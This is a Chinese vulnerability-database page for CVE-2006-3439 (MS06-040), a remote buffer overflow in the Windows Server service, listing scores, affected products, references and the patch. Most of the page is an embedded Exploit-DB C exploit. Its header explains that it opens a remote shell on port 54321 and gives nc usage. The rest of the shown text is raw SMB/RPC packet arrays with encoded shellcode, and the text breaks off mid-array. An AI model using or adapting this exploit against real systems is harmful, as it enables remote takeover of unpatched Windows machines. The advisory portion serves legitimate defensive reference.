CVE-2006-3439
CVSS10.0
发布时间 :2006-08-08 21:04:00
修订时间 :2011-03-07 21:38:39
NMCOEPS    

[原文]Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.


[CNNVD]Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040)(CNNVD-200608-123)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的Server服务在处理RPC接口的通信中存在栈缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意指令。
        此漏洞的利用比较容易且影响面较广,已有利用此漏洞传播的蠕虫出现。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2003_server:itanium
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2003_server:sp1::itanium
cpe:/o:microsoft:windows_2003_server:sp1
cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:492Buffer Overrun in Server Service Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-123
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-220A.html
(PATCH)  CERT  TA06-220A
http://www.kb.cert.org/vuls/id/650769
(PATCH)  CERT-VN  VU#650769
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
(PATCH)  MS  MS06-040
http://secunia.com/advisories/21388
(VENDOR_ADVISORY)  SECUNIA  21388
http://xforce.iss.net/xforce/xfdb/28002
(UNKNOWN)  XF  ms-server-service-bo(28002)
http://www.vupen.com/english/advisories/2006/3210
(UNKNOWN)  VUPEN  ADV-2006-3210
http://www.securityfocus.com/bid/19409
(UNKNOWN)  BID  19409
http://www.dhs.gov/dhspublic/display?content=5789
(UNKNOWN)  MISC  http://www.dhs.gov/dhspublic/display?content=5789
http://securitytracker.com/id?1016667
(UNKNOWN)  SECTRACK  1016667
http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008070c75a.html
(UNKNOWN)  CISCO  20060814 Mitigating Exploitation of the MS06-040 Service Buffer Vulnerability

- 漏洞信息

Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040)
危急 缓冲区溢出
2006-08-08 00:00:00 2006-08-18 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的Server服务在处理RPC接口的通信中存在栈缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意指令。
        此漏洞的利用比较容易且影响面较广,已有利用此漏洞传播的蠕虫出现。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx?pf=true

- 漏洞信息 (2223)

MS Windows CanonicalizePathName() Remote Exploit (MS06-040) (EDBID:2223)
windows remote
2006-08-19 Verified
139 Preddy
N/A [点击下载]
/*

Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy

This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe

On successfull exploitation it provides a remote shell at port 54321
of your victim:

./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!

[open a new terminal/window/prompt]

nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

http://www.team-rootshell.com

Greetz to all of my friends at:

FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
MILW0RM(ABS.lcirc.net): #milw0rm
STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal)
PTP(irc.eu.pulltheplug.org): #aso,#Social
GSO(gso.eclipticx.net): #gso-chat
TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php
SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan

Rootshell Security Group and everyone else ^^

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/mman.h>

#define PORT 139

char peer0_0[] = {
0x81, 0x00, 0x00, 0x44, 0x20, 0x43, 0x4b, 0x46, 
0x44, 0x45, 0x4e, 0x45, 0x43, 0x46, 0x44, 0x45, 
0x46, 0x46, 0x43, 0x46, 0x47, 0x45, 0x46, 0x46, 
0x43, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00 };

char peer0_1[] = {
0x00, 0x00, 0x00, 0x54, 0xff, 0x53, 0x4d, 0x42, 
0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x00, 0x84, 0xec, 0x00, 0x31, 0x00, 0x02, 
0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 
0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 
0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4e, 0x54, 
0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, 
0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, 
0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 };

char peer0_2[] = {
0x00, 0x00, 0x00, 0xb5, 0xff, 0x53, 0x4d, 0x42, 
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x00, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 
0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x5c, 0xd0, 0x00, 0x80, 0x7a, 0x00, 0x60, 
0x55, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, 
0x02, 0xa0, 0x4b, 0x30, 0x49, 0xa0, 0x0e, 0x30, 
0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 
0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x37, 0x04, 
0x35, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, 
0x00, 0x09, 0x00, 0x09, 0x00, 0x20, 0x00, 0x00, 
0x00, 0x0c, 0x00, 0x0c, 0x00, 0x29, 0x00, 0x00, 
0x00, 0x57, 0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, 
0x55, 0x50, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x54, 
0x41, 0x54, 0x49, 0x4f, 0x4e, 0x31, 0x57, 0x69, 
0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 
0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 
0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 
0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 
0x00 };

char peer0_3[] = {
0x00, 0x00, 0x01, 0x04, 0xff, 0x53, 0x4d, 0x42, 
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 
0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x5c, 0xd0, 0x00, 0x80, 0xc9, 0x00, 0xa1, 
0x81, 0xa3, 0x30, 0x81, 0xa0, 0xa2, 0x81, 0x9d, 
0x04, 0x81, 0x9a, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 
0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x40, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x58, 0x00, 0x00, 0x00, 0x12, 
0x00, 0x12, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x82, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x02, 0x08, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 
0x05, 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x25, 0xa6, 0x9f, 0x80, 0x96, 
0x31, 0x6c, 0xca, 0xa0, 0x08, 0x9f, 0x12, 0x7e, 
0x47, 0xcd, 0x45, 0x10, 0x25, 0x39, 0x7d, 0xf8, 
0x55, 0x66, 0x03, 0x57, 0x00, 0x4f, 0x00, 0x52, 
0x00, 0x4b, 0x00, 0x47, 0x00, 0x52, 0x00, 0x4f, 
0x00, 0x55, 0x00, 0x50, 0x00, 0x57, 0x00, 0x4f, 
0x00, 0x52, 0x00, 0x4b, 0x00, 0x53, 0x00, 0x54, 
0x00, 0x41, 0x00, 0x54, 0x00, 0x49, 0x00, 0x4f, 
0x00, 0x4e, 0x00, 0x31, 0x00, 0x57, 0x69, 0x6e, 
0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 
0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, 
0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 
0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 };

char peer0_4[] = {
0x00, 0x00, 0x00, 0x3a, 0xff, 0x53, 0x4d, 0x42, 
0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x04, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x01, 0x00, 0x0f, 0x00, 0x00, 
0x5c, 0x5c, 0x5c, 0x49, 0x50, 0x43, 0x24, 0x00, 
0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 };

char peer0_5[] = {
0x00, 0x00, 0x00, 0x5c, 0xff, 0x53, 0x4d, 0x42, 
0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x18, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 
0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 
0x02, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x5c, 
0x42, 0x52, 0x4f, 0x57, 0x53, 0x45, 0x52, 0x00 };

char peer0_6[] = {
0x00, 0x00, 0x00, 0x92, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x48, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x48, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x4f, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x16, 
0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 
0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 
0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 
0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 
0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 
0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };

char peer0_7[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 
0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 
0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 
0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 
0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 
0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 
0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 
0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 
0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 
0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 
0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 
0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 
0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 
0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 
0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 
0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 
0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 
0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 
0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 
0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 
0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 
0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 
0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 
0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 
0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 
0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 
0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 
0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 
0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 
0x7c, 0x45, 0x8e };

char peer0_8[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 
0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 
0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 
0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 
0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 
0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 
0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 
0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 
0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 
0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 
0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 
0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 
0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 
0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 
0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 
0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 
0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 
0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 
0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 
0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 
0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 
0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 
0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 
0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 
0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 
0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 
0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 
0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 
0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 
0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 
0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 
0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 
0x52, 0x66, 0x79 };

char peer0_9[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 
0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 
0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 
0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 
0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 
0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 
0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 
0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 
0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 
0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 
0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 
0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 
0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 
0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 
0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 
0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 
0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 
0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 
0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 
0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 
0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 
0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 
0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, 
0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 
0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 
0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 
0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 
0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 
0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 
0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 
0x00, 0x00, 0x00 };

char peer0_10[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };

char peer0_11[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 
0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 
0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 
0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 
0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 
0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 
0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 
0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 
0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 
0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 
